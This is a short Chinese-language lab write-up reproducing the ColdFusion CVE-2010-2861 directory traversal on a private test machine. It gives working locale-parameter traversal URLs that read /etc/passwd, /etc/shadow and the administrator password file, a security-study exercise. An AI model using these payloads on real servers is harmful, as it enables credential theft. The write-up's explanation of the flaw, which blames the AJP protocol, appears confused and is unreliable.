Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现
漏洞原理
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。
Adobe ColdFusion 8、9版本中皆存在一处目录穿越漏洞。
实验环境
一、靶机:
系统:ubuntu搭建的测试靶场
IP:192.168.88.129
二、攻击机:
系统:win10
IP:192.168.88.137
漏洞环境
启动coldfusion(建议网速好的时候弄,有点大):
环境启动后,可在浏览器页面访问http://192.168.88.129:8500/ CFIDE/administrator/enter.cfm,输入密码:admin,开始初始化整个环境
漏洞复现
一、访问:http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,用burp截取
删除其中的cookie信息后,即可读取文件/etc/passwd
也可读取文件/etc/shadow
二、访问:/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en,读取后台管理员密码
参考链接:https://blog.****.net/qq_36374896/article/details/84191264